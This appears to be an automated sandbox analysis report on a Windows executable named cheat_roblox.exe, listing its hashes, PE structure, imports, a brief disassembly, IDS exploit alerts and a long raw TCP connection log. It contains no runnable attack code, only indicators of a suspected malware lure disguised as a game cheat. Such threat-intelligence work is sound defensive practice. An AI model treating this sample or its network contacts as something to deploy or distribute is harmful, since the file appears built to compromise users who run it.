                                                                                                                Entropy (8bit):7.051559084988302
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:tj+cYUFqb9Oq2EWxiWlb+hKI526WogYAGJe9UCZE12REqtVv6n:tqeqZF3WxiHKI5KopAMQUD10EqtVv6
                                                                                                                MD5:1BD6EB140EC5E09AF54808BCE2BE74BE
                                                                                                                SHA1:00746108650919B88014CE35AABF72B0F20B2046
                                                                                                                SHA-256:3E13369E5C528A4598007330A7D572DADD181E268D0CF87BA7B62FD7668597F8
                                                                                                                SHA-512:FA58EB9D8DB6819BCD39EC73089942D7F16CA602322E3EFA592A3418FB735A87DF9FD5388830F8E1E699CB5457234626F2B09DACEC83E265F300CE19AA907DBE
                                                                                                                Malicious:false
                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Entropy (8bit):7.909822900338073
                                                                                                                TrID:
                                                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:cheat_roblox.exe
                                                                                                                File size:2'675'335 bytes
                                                                                                                MD5:d49b1a211ce49bed3e766471501819c6
                                                                                                                SHA1:ed8f8b0d45ad556115c14a00247c080fa82d56e9
                                                                                                                SHA256:1673b4f5f2d5ae3e3d2c5816534bf904ed1d2653b4a40bbb2a320231eca8259a
                                                                                                                SHA512:2a0ec111c39ed2d5e02555a18a94f84bb546d1fc4f827ddeb24709b9b86259318611626a578918c5d8e60a5667e774c0d36241b6b668afb466a8806d37c2b7d2
                                                                                                                SSDEEP:49152:1Djlabwz97DQNxlq9fFQXLkL9g+/kW/4JNe0OL108Jgwya3fj8kSbn17:Zqw5skLZbaWL108JgwnvS5
                                                                                                                TLSH:48C5120AF3A509F8E073E57889474906F67A3C1A13319BCF13A5556B2F673A1CE2E352
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\
                                                                                                                Icon Hash:1515d4d4442f2d2d
                                                                                                                Entrypoint:0x140032ee0
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x140000000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x66409723 [Sun May 12 10:17:07 2024 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:5
                                                                                                                OS Version Minor:2
                                                                                                                File Version Major:5
                                                                                                                File Version Minor:2
                                                                                                                Subsystem Version Major:5
                                                                                                                Subsystem Version Minor:2
                                                                                                                Import Hash:b1c5b1beabd90d9fdabd1df0779ea832
                                                                                                                Instruction
                                                                                                                dec eax
                                                                                                                sub esp, 28h
                                                                                                                call 00007F23E4EE5C18h
                                                                                                                dec eax
                                                                                                                add esp, 28h
                                                                                                                jmp 00007F23E4EE55AFh
                                                                                                                int3
                                                                                                                int3
                                                                                                                dec eax
                                                                                                                mov eax, esp
                                                                                                                dec eax
                                                                                                                mov dword ptr [eax+08h], ebx
                                                                                                                dec eax
                                                                                                                mov dword ptr [eax+10h], ebp
                                                                                                                dec eax
                                                                                                                mov dword ptr [eax+18h], esi
                                                                                                                dec eax
                                                                                                                mov dword ptr [eax+20h], edi
                                                                                                                inc ecx
                                                                                                                push esi
                                                                                                                dec eax
                                                                                                                sub esp, 20h
                                                                                                                dec ebp
                                                                                                                mov edx, dword ptr [ecx+38h]
                                                                                                                dec eax
                                                                                                                mov esi, edx
                                                                                                                dec ebp
                                                                                                                mov esi, eax
                                                                                                                dec eax
                                                                                                                mov ebp, ecx
                                                                                                                dec ecx
                                                                                                                mov edx, ecx
                                                                                                                dec eax
                                                                                                                mov ecx, esi
                                                                                                                dec ecx
                                                                                                                mov edi, ecx
                                                                                                                inc ecx
                                                                                                                mov ebx, dword ptr [edx]
                                                                                                                dec eax
                                                                                                                shl ebx, 04h
                                                                                                                dec ecx
                                                                                                                add ebx, edx
                                                                                                                dec esp
                                                                                                                lea eax, dword ptr [ebx+04h]
                                                                                                                call 00007F23E4EE4A33h
                                                                                                                mov eax, dword ptr [ebp+04h]
                                                                                                                and al, 66h
                                                                                                                neg al
                                                                                                                mov eax, 00000001h
                                                                                                                sbb edx, edx
                                                                                                                neg edx
                                                                                                                add edx, eax
                                                                                                                test dword ptr [ebx+04h], edx
                                                                                                                je 00007F23E4EE5743h
                                                                                                                dec esp
                                                                                                                mov ecx, edi
                                                                                                                dec ebp
                                                                                                                mov eax, esi
                                                                                                                dec eax
                                                                                                                mov edx, esi
                                                                                                                dec eax
                                                                                                                mov ecx, ebp
                                                                                                                call 00007F23E4EE7757h
                                                                                                                dec eax
                                                                                                                mov ebx, dword ptr [esp+30h]
                                                                                                                dec eax
                                                                                                                mov ebp, dword ptr [esp+38h]
                                                                                                                dec eax
                                                                                                                mov esi, dword ptr [esp+40h]
                                                                                                                dec eax
                                                                                                                mov edi, dword ptr [esp+48h]
                                                                                                                dec eax
                                                                                                                add esp, 20h
                                                                                                                inc ecx
                                                                                                                pop esi
                                                                                                                ret
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                dec eax
                                                                                                                sub esp, 48h
                                                                                                                dec eax
                                                                                                                lea ecx, dword ptr [esp+20h]
                                                                                                                call 00007F23E4ED3FC3h
                                                                                                                dec eax
                                                                                                                lea edx, dword ptr [00025747h]
                                                                                                                dec eax
                                                                                                                lea ecx, dword ptr [esp+20h]
                                                                                                                call 00007F23E4EE6812h
                                                                                                                int3
                                                                                                                jmp 00007F23E4EEC9F4h
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                Programming Language:
                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x597a0 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x597d4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x70000 | 0xe3bc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x6a000 | 0x306c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7f000 | 0x970 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x536c0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x53780 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4b3f0 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x48000 | 0x508 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x588bc | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x4676e | 0x46800 | f06bb06e02377ae8b223122e53be35c2 | False | 0.5372340425531915 | data | 6.47079645411382 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x48000 | 0x128c4 | 0x12a00 | 2de06d4a6920a6911e64ff20000ea72f | False | 0.4499003775167785 | data | 5.273999097784603 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x5b000 | 0xe75c | 0x1a00 | 0dbdb901a7d477980097e42e511a94fb | False | 0.28275240384615385 | data | 3.2571023907881185 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x6a000 | 0x306c | 0x3200 | b0ce0f057741ad2a4ef4717079fa34e9 | False | 0.483359375 | data | 5.501810413666288 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.didat | 0x6e000 | 0x360 | 0x400 | 1fcc7b1d7a02443319f8fcc2be4ca936 | False | 0.2578125 | data | 3.0459938492946015 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
_RDATA | 0x6f000 | 0x15c | 0x200 | 3f331ec50f09ba861beaf955b33712d5 | False | 0.408203125 | data | 3.3356393424384843 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x70000 | 0xe3bc | 0xe400 | 1b279dad3e3d77fcdfb269a130bf474b | False | 0.6334121436403509 | data | 6.778407783727912 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x7f000 | 0x970 | 0xa00 | 77a9ddfc47a5650d6eebbcc823e39532 | False | 0.52421875 | data | 5.336289720085303 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x70674 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | | | 1.0027729636048528
PNG | 0x711bc | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | | | 0.9363390441839495
RT_ICON | 0x72768 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | | | 0.47832369942196534
RT_ICON | 0x72cd0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | | | 0.5410649819494585
RT_ICON | 0x73578 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | | | 0.4933368869936034
RT_ICON | 0x74420 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | | | 0.5390070921985816
RT_ICON | 0x74888 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | | | 0.41393058161350843
RT_ICON | 0x75930 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | | | 0.3479253112033195
RT_ICON | 0x77ed8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9809269502193401
RT_DIALOG | 0x7bc4c | 0x2ba | data | | | 0.5286532951289399
RT_DIALOG | 0x7bf08 | 0x13a | data | | | 0.6560509554140127
RT_DIALOG | 0x7c044 | 0xf2 | data | | | 0.71900826446281
RT_DIALOG | 0x7c138 | 0x14a | data | | | 0.6
RT_DIALOG | 0x7c284 | 0x314 | data | | | 0.47588832487309646
RT_DIALOG | 0x7c598 | 0x24a | data | | | 0.6279863481228669
RT_STRING | 0x7c7e4 | 0x1fc | data | | | 0.421259842519685
RT_STRING | 0x7c9e0 | 0x246 | data | | | 0.41924398625429554
RT_STRING | 0x7cc28 | 0x1a6 | data | | | 0.514218009478673
RT_STRING | 0x7cdd0 | 0xdc | data | | | 0.65
RT_STRING | 0x7ceac | 0x470 | data | | | 0.3873239436619718
RT_STRING | 0x7d31c | 0x164 | data | | | 0.5056179775280899
RT_STRING | 0x7d480 | 0x110 | data | | | 0.5772058823529411
RT_STRING | 0x7d590 | 0x158 | data | | | 0.4563953488372093
RT_STRING | 0x7d6e8 | 0xe8 | data | | | 0.5948275862068966
RT_STRING | 0x7d7d0 | 0x1c6 | data | | | 0.5242290748898678
RT_STRING | 0x7d998 | 0x268 | data | | | 0.4837662337662338
RT_GROUP_ICON | 0x7dc00 | 0x68 | data | | | 0.7019230769230769
RT_MANIFEST | 0x7dc68 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.3957333333333333
DLL | Import
KERNEL32.dll | LocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-30T00:49:18.443625+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49732 | 20.114.59.183 | 192.168.2.9
2024-07-30T00:49:42.483073+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 61123 | 40.127.169.103 | 192.168.2.9
2024-07-30T00:49:41.144546+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 61122 | 40.127.169.103 | 192.168.2.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                Jul 30, 2024 00:49:17.279704094 CEST44349731104.21.4.208192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.279732943 CEST44349731104.21.4.208192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.279761076 CEST44349731104.21.4.208192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.279825926 CEST49731443192.168.2.9104.21.4.208
                                                                                                                Jul 30, 2024 00:49:17.279850006 CEST44349731104.21.4.208192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.279867887 CEST49731443192.168.2.9104.21.4.208
                                                                                                                Jul 30, 2024 00:49:17.280817986 CEST49731443192.168.2.9104.21.4.208
                                                                                                                Jul 30, 2024 00:49:17.280834913 CEST44349731104.21.4.208192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.280875921 CEST49731443192.168.2.9104.21.4.208
                                                                                                                Jul 30, 2024 00:49:17.300630093 CEST49733443192.168.2.935.190.80.1
                                                                                                                Jul 30, 2024 00:49:17.300669909 CEST4434973335.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.300837994 CEST49733443192.168.2.935.190.80.1
                                                                                                                Jul 30, 2024 00:49:17.301341057 CEST49733443192.168.2.935.190.80.1
                                                                                                                Jul 30, 2024 00:49:17.301357985 CEST4434973335.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.383107901 CEST4434973088.212.202.52192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.383980036 CEST49730443192.168.2.988.212.202.52
                                                                                                                Jul 30, 2024 00:49:17.384011030 CEST4434973088.212.202.52192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.385081053 CEST4434973088.212.202.52192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.385160923 CEST49730443192.168.2.988.212.202.52
                                                                                                                Jul 30, 2024 00:49:17.391846895 CEST49730443192.168.2.988.212.202.52
                                                                                                                Jul 30, 2024 00:49:17.391928911 CEST4434973088.212.202.52192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.392014980 CEST49730443192.168.2.988.212.202.52
                                                                                                                Jul 30, 2024 00:49:17.436497927 CEST4434973088.212.202.52192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.446106911 CEST49730443192.168.2.988.212.202.52
                                                                                                                Jul 30, 2024 00:49:17.446126938 CEST4434973088.212.202.52192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.494107962 CEST49730443192.168.2.988.212.202.52
                                                                                                                Jul 30, 2024 00:49:17.621140003 CEST4434973088.212.202.52192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.621232033 CEST4434973088.212.202.52192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.621438026 CEST49730443192.168.2.988.212.202.52
                                                                                                                Jul 30, 2024 00:49:17.621762991 CEST49730443192.168.2.988.212.202.52
                                                                                                                Jul 30, 2024 00:49:17.621790886 CEST4434973088.212.202.52192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.621820927 CEST49730443192.168.2.988.212.202.52
                                                                                                                Jul 30, 2024 00:49:17.621841908 CEST49730443192.168.2.988.212.202.52
                                                                                                                Jul 30, 2024 00:49:17.624226093 CEST49736443192.168.2.988.212.202.52
                                                                                                                Jul 30, 2024 00:49:17.624245882 CEST4434973688.212.202.52192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.624362946 CEST49736443192.168.2.988.212.202.52
                                                                                                                Jul 30, 2024 00:49:17.624562025 CEST49736443192.168.2.988.212.202.52
                                                                                                                Jul 30, 2024 00:49:17.624574900 CEST4434973688.212.202.52192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.793275118 CEST4434973335.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.806822062 CEST49733443192.168.2.935.190.80.1
                                                                                                                Jul 30, 2024 00:49:17.806858063 CEST4434973335.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.808085918 CEST4434973335.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.808150053 CEST49733443192.168.2.935.190.80.1
                                                                                                                Jul 30, 2024 00:49:17.810664892 CEST49733443192.168.2.935.190.80.1
                                                                                                                Jul 30, 2024 00:49:17.810734987 CEST4434973335.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.810827971 CEST49733443192.168.2.935.190.80.1
                                                                                                                Jul 30, 2024 00:49:17.836663961 CEST49739443192.168.2.9128.116.21.4
                                                                                                                Jul 30, 2024 00:49:17.836715937 CEST44349739128.116.21.4192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.836878061 CEST49739443192.168.2.9128.116.21.4
                                                                                                                Jul 30, 2024 00:49:17.838486910 CEST49739443192.168.2.9128.116.21.4
                                                                                                                Jul 30, 2024 00:49:17.838505030 CEST44349739128.116.21.4192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.856498957 CEST4434973335.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.862107038 CEST49733443192.168.2.935.190.80.1
                                                                                                                Jul 30, 2024 00:49:17.862122059 CEST4434973335.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.910136938 CEST49733443192.168.2.935.190.80.1
                                                                                                                Jul 30, 2024 00:49:17.945919037 CEST4434973335.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.945986032 CEST4434973335.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.946043968 CEST49733443192.168.2.935.190.80.1
                                                                                                                Jul 30, 2024 00:49:17.946322918 CEST49733443192.168.2.935.190.80.1
                                                                                                                Jul 30, 2024 00:49:17.946342945 CEST4434973335.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.946999073 CEST49740443192.168.2.935.190.80.1
                                                                                                                Jul 30, 2024 00:49:17.947025061 CEST4434974035.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.947309017 CEST49740443192.168.2.935.190.80.1
                                                                                                                Jul 30, 2024 00:49:17.947529078 CEST49740443192.168.2.935.190.80.1
                                                                                                                Jul 30, 2024 00:49:17.947542906 CEST4434974035.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.082750082 CEST4434973220.114.59.183192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.082840919 CEST49732443192.168.2.920.114.59.183
                                                                                                                Jul 30, 2024 00:49:18.085534096 CEST49732443192.168.2.920.114.59.183
                                                                                                                Jul 30, 2024 00:49:18.085546017 CEST4434973220.114.59.183192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.085864067 CEST4434973220.114.59.183192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.134115934 CEST49732443192.168.2.920.114.59.183
                                                                                                                Jul 30, 2024 00:49:18.161396980 CEST49732443192.168.2.920.114.59.183
                                                                                                                Jul 30, 2024 00:49:18.208492041 CEST4434973220.114.59.183192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.228512049 CEST49704443192.168.2.923.206.229.209
                                                                                                                Jul 30, 2024 00:49:18.228552103 CEST49704443192.168.2.923.206.229.209
                                                                                                                Jul 30, 2024 00:49:18.238611937 CEST49741443192.168.2.923.206.229.209
                                                                                                                Jul 30, 2024 00:49:18.238650084 CEST4434974123.206.229.209192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.239223957 CEST49741443192.168.2.923.206.229.209
                                                                                                                Jul 30, 2024 00:49:18.243215084 CEST49741443192.168.2.923.206.229.209
                                                                                                                Jul 30, 2024 00:49:18.243227005 CEST4434974123.206.229.209192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.244162083 CEST4434970423.206.229.209192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.244177103 CEST4434970423.206.229.209192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.357819080 CEST4434973688.212.202.52192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.358570099 CEST49736443192.168.2.988.212.202.52
                                                                                                                Jul 30, 2024 00:49:18.358594894 CEST4434973688.212.202.52192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.359127998 CEST4434973688.212.202.52192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.359529972 CEST49736443192.168.2.988.212.202.52
                                                                                                                Jul 30, 2024 00:49:18.359601021 CEST4434973688.212.202.52192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.359719992 CEST49736443192.168.2.988.212.202.52
                                                                                                                Jul 30, 2024 00:49:18.404491901 CEST4434973688.212.202.52192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.441020012 CEST4434973220.114.59.183192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.441042900 CEST4434973220.114.59.183192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.441050053 CEST4434973220.114.59.183192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.441060066 CEST4434973220.114.59.183192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.441077948 CEST4434973220.114.59.183192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.441135883 CEST49732443192.168.2.920.114.59.183
                                                                                                                Jul 30, 2024 00:49:18.441179037 CEST4434973220.114.59.183192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.441207886 CEST49732443192.168.2.920.114.59.183
                                                                                                                Jul 30, 2024 00:49:18.441227913 CEST49732443192.168.2.920.114.59.183
                                                                                                                Jul 30, 2024 00:49:18.443408012 CEST4434973220.114.59.183192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.443480015 CEST49732443192.168.2.920.114.59.183
                                                                                                                Jul 30, 2024 00:49:18.443511963 CEST4434973220.114.59.183192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.443532944 CEST4434973220.114.59.183192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.443605900 CEST49732443192.168.2.920.114.59.183
                                                                                                                Jul 30, 2024 00:49:18.467045069 CEST4434974035.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.476370096 CEST49740443192.168.2.935.190.80.1
                                                                                                                Jul 30, 2024 00:49:18.476391077 CEST4434974035.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.476799965 CEST4434974035.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.477507114 CEST49732443192.168.2.920.114.59.183
                                                                                                                Jul 30, 2024 00:49:18.477519989 CEST4434973220.114.59.183192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.477533102 CEST49732443192.168.2.920.114.59.183
                                                                                                                Jul 30, 2024 00:49:18.477538109 CEST4434973220.114.59.183192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.477714062 CEST49740443192.168.2.935.190.80.1
                                                                                                                Jul 30, 2024 00:49:18.477777004 CEST4434974035.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.477999926 CEST49740443192.168.2.935.190.80.1
                                                                                                                Jul 30, 2024 00:49:18.524503946 CEST4434974035.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.576791048 CEST44349739128.116.21.4192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.584754944 CEST49739443192.168.2.9128.116.21.4
                                                                                                                Jul 30, 2024 00:49:18.584791899 CEST44349739128.116.21.4192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.585882902 CEST44349739128.116.21.4192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.585938931 CEST49739443192.168.2.9128.116.21.4
                                                                                                                Jul 30, 2024 00:49:18.589524031 CEST49739443192.168.2.9128.116.21.4
                                                                                                                Jul 30, 2024 00:49:18.589699030 CEST44349739128.116.21.4192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.589699984 CEST49739443192.168.2.9128.116.21.4
                                                                                                                Jul 30, 2024 00:49:18.589890957 CEST49739443192.168.2.9128.116.21.4
                                                                                                                Jul 30, 2024 00:49:18.618577003 CEST4434974035.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.618709087 CEST4434974035.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.618773937 CEST49740443192.168.2.935.190.80.1
                                                                                                                Jul 30, 2024 00:49:18.619024992 CEST49740443192.168.2.935.190.80.1
                                                                                                                Jul 30, 2024 00:49:18.619044065 CEST4434974035.190.80.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.771528006 CEST4434973688.212.202.52192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.771616936 CEST4434973688.212.202.52192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.771972895 CEST49736443192.168.2.988.212.202.52
                                                                                                                Jul 30, 2024 00:49:18.783961058 CEST49736443192.168.2.988.212.202.52
                                                                                                                Jul 30, 2024 00:49:18.783984900 CEST4434973688.212.202.52192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.796180964 CEST49742443192.168.2.9104.21.4.208
                                                                                                                Jul 30, 2024 00:49:18.796236038 CEST44349742104.21.4.208192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.796302080 CEST49742443192.168.2.9104.21.4.208
                                                                                                                Jul 30, 2024 00:49:18.796549082 CEST49742443192.168.2.9104.21.4.208
